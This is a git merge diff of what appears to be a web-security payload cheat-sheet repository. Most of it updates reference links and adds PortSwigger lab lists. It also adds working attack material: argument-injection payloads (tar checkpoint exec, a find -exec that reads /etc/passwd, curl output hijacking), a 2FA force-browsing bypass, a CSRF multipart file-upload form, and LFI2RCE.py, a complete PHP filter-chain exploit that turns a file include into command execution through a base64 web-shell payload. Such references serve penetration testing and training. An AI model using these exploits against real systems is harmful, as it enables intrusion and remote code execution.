Merge branch 'master' into patch-4

.gitignore

@@ -1,4 +1,3 @@
 BuildPDF/
 .vscode
-.todo
-AWS Amazon Lambda/
+.todo

API Key Leaks/README.md

@@ -24,15 +24,16 @@
 ## Tools
 
 - [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder)
-- [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
-- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog)
+- [KeyHacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
+- [TruffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog)
     ```ps1
     docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys
     docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
     trufflehog git https://github.com/trufflesecurity/trufflehog.git
     trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2
     ```
-
+- [Trivy - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets](https://github.com/aquasecurity/trivy)
+
 ## Exploit
 
 The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.

AWS Amazon Bucket S3/README.md

@@ -159,10 +159,10 @@ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws
 ## References
 
 * [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
-* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
+* [Bug Bounty Survey - AWS Basic test](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
 * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
 * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
-* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
+* [Guardzilla video camera hardcoded AWS credential ~~- 0dayallday.org~~ - blackmarble.sh](https://blackmarble.sh/guardzilla-video-camera-hard-coded-aws-credentials/)
 * [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
 * [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
 * [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)

Account Takeover/README.md

@@ -27,6 +27,7 @@
     * [Backup Code Abuse](#backup-code-abuse)
     * [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page)
     * [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions)
+    * [Bypass 2FA by Force Browsing](#bypass-2fa-by-force-browsing)
     * [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000)
     * [Bypass 2FA with array](#bypass-2fa-with-array)
 * [References](#references)
@@ -228,6 +229,10 @@ Iframing the 2FA Disabling page and social engineering victim to disable the 2FA
 
 If the session is already hijacked and there is a session timeout vuln
 
+### Bypass 2FA by Force Browsing
+
+If the application redirects to `/my-account` url upon login while 2Fa is disabled, try replacing `/2fa/verify` with `/my-account` while 2FA is enabled to bypass verification.
+
 ### Bypass 2FA with null or 000000
 Enter the code **000000** or **null** to bypass 2FA protection.
 
@@ -257,8 +262,9 @@ Enter the code **000000** or **null** to bypass 2FA protection.
 
 ## References
 
-- [10 Password Reset Flaws - Anugrah SR](http://anugrahsr.me/posts/10-Password-reset-flaws/)
+- [10 Password Reset Flaws - Anugrah SR](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
 - [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained](https://www.youtube.com/watch?v=gzM4wWA7RFo&feature=youtu.be)
 - [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28)
 - [Hacking Grindr Accounts with Copy and Paste - Troy HUNT & Wassime BOUIMADAGHENE - 03 OCTOBER 2020](https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/)
 - [CTFd Account Takeover](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
+- [2FA simple bypass](https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass)

Argument Injection/README.md

@@ -0,0 +1,89 @@
+# Argument Injection
+Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping.
+
+It can happen in different situations, where you can only inject arguments to a command:
+
+- Improper sanitization (regex)
+- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
+- Bash expansion (ex: *)
+
+In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:
+```py
+from shlex import quote,split
+import sys
+import subprocess
+
+if __name__=="__main__":
+    command = ['curl']
+    command = command + split(sys.argv[1])
+    print(command)
+    r = subprocess.Popen(command)
+```
+It is possible for an attacker to pass several words to abuse options from ```curl``` command
+```ps1
+python python_rce.py "https://www.google.fr -o test.py" 
+```
+We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file.
+```ps1
+['curl', 'https://www.google.fr', '-o', 'test.py']
+```
+## Summary
+
+* [List of exposed commands](#list-of-exposed-commands)
+  * [TAR](#TAR)
+  * [CURL](#CURL)
+  * [WGET](#WGET)
+* [References](#references)
+
+
+## List of exposed commands
+
+### CURL
+It is possible to abuse ```curl``` through the following options:
+
+```ps1
+ -o, --output <file>        Write to file instead of stdout
+ -O, --remote-name          Write output to a file named as the remote file
+```
+In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.
+
+### TAR
+For the ```tar``` command it is possible to inject arbitrary arguments in different commands. 
+
+Argument injection can happen into the '''extract''' command:
+```ps1
+--to-command <command>
+--checkpoint=1 --checkpoint-action=exec=<command>
+-T <file> or --files-from <file>
+```
+
+Or in the '''create''' command:
+```ps1
+-I=<program> or -I <program>
+--use-compres-program=<program>
+```
+There are also short options to work without spaces:
+```ps1
+-T<file>
+-I"/path/to/exec"
+```
+
+### FIND
+Find some_file inside /tmp directory.
+```php
+$file = "some_file";
+system("find /tmp -iname ".escapeshellcmd($file));
+```
+
+Print /etc/passwd content.
+```php
+$file = "sth -or -exec cat /etc/passwd ; -quit";
+system("find /tmp -iname ".escapeshellcmd($file));
+```
+
+
+## References
+
+- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
+- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930)
+- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek,  Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)

CORS Misconfiguration/README.md

@@ -244,6 +244,13 @@ function reqListener() {
 };
 ```
 
+## Labs
+
+* [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
+* [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
+* [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
+* [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
+
 ## Bug Bounty reports
 
 * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)

CRLF Injection/README.md

@@ -103,6 +103,9 @@ Remainder:
 * %E5%98%BE = %3E = \u563e (>)
 * %E5%98%BC = %3C = \u563c (<)
 
+## Labs
+
+* [https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
 
 ## Exploitation Tricks
 * Try to search for parameters that lead to redirects and fuzz them

CSRF Injection/README.md

@@ -11,6 +11,7 @@
     * [HTML GET - No User Interaction)](#html-get---no-user-interaction)
     * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
     * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
+    * [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction)
     * [JSON GET - Simple Request](#json-get---simple-request)
     * [JSON POST - Simple Request](#json-post---simple-request)
     * [JSON POST - Complex Request](#json-post---complex-request)
@@ -67,6 +68,27 @@ When you are logged in to a certain site, you typically have a session. The iden
 </script>
 ```
 
+### HTML POST - multipart/form-data with file upload - Requiring User Interaction
+
+```html
+<script>
+function launch(){
+    const dT = new DataTransfer();
+    const file = new File( [ "CSRF-filecontent" ], "CSRF-filename" );
+    dT.items.add( file );
+    document.xss[0].files = dT.files;
+
+    document.xss.submit()
+}
+</script>
+
+<form style="display: none" name="xss" method="post" action="<target>" enctype="multipart/form-data">
+<input id="file" type="file" name="file"/>
+<input type="submit" name="" value="" size="0" />
+</form>
+<button value="button" onclick="launch()">Submit Request</button>
+```
+
 
 ### JSON GET - Simple Request
 
@@ -138,6 +160,18 @@ Referer: https://attacker.com/csrf.html;trusted.domain.com
 Referer: https://trusted.domain.com.attacker.com/csrf.html
 ```
 
+## Labs
+
+* [CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses)
+* [CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method)
+* [CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present)
+* [CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session)
+* [CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie)
+* [CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie)
+* [CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present)
+* [CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken)
+
+
 ## References
 
 - [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)

CSV Injection/README.md

@@ -53,11 +53,11 @@ Any formula can be started with
 
 ## References
 
-* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
-* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
-* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
+* [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection)
+* [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection)
 * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
 * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
-* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf)
 * [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
 * [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
+* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)
+

CVE Exploits/README.md

@@ -1,5 +1,9 @@
 # Common Vulnerabilities and Exposures
 
+## Tools
+
+- [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve)
+
 ## Big CVEs in the last 5 years.
 
 ### CVE-2017-0144 - EternalBlue

Command Injection/README.md

@@ -297,9 +297,18 @@ echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(
 echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
 ```
 
+## Labs
+
+* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
+* [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
+* [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
+* [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
+* [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
+
 ## References
 
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
-* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
+* [Bug Bounty Survey - Windows RCE spaceless](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
 * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
 * [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)
+* [What is OS command injection - portswigger](https://portswigger.net/web-security/os-command-injection)

Directory Traversal/README.md

@@ -194,6 +194,14 @@ The following log files are controllable and can be included with an evil payloa
 /var/log/sshd.log
 /var/log/mail
 ```
+## Labs
+
+* [File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple)
+* [File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass)
+* [File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively)
+* [File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)
+* [File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path)
+* [File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass)
 
 ## References
 

File Inclusion/LFI2RCE.py

@@ -0,0 +1,60 @@
+import requests
+
+url = "http://localhost:8000/chall.php"
+file_to_use = "/etc/passwd"
+command = "id"
+
+#<?=`$_GET[0]`;;?>
+base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
+
+conversions = {
+    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
+    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
+    'C': 'convert.iconv.UTF8.CSISO2022KR',
+    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
+    '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
+    'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
+    's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
+    'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
+    'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
+    'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
+    'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
+    '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
+    'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
+    'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
+    'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
+    'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
+    '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
+    '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
+}
+
+
+# generate some garbage base64
+filters = "convert.iconv.UTF8.CSISO2022KR|"
+filters += "convert.base64-encode|"
+# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
+filters += "convert.iconv.UTF8.UTF7|"
+
+
+for c in base64_payload[::-1]:
+        filters += conversions[c] + "|"
+        # decode and reencode to get rid of everything that isn't valid base64
+        filters += "convert.base64-decode|"
+        filters += "convert.base64-encode|"
+        # get rid of equal signs
+        filters += "convert.iconv.UTF8.UTF7|"
+
+filters += "convert.base64-decode"
+
+final_payload = f"php://filter/{filters}/resource={file_to_use}"
+
+with open('payload', 'w') as f:
+    f.write(final_payload)
+
+r = requests.get(url, params={
+    "0": command,
+    "action": "include",
+    "file": final_payload
+})
+
+print(r.text)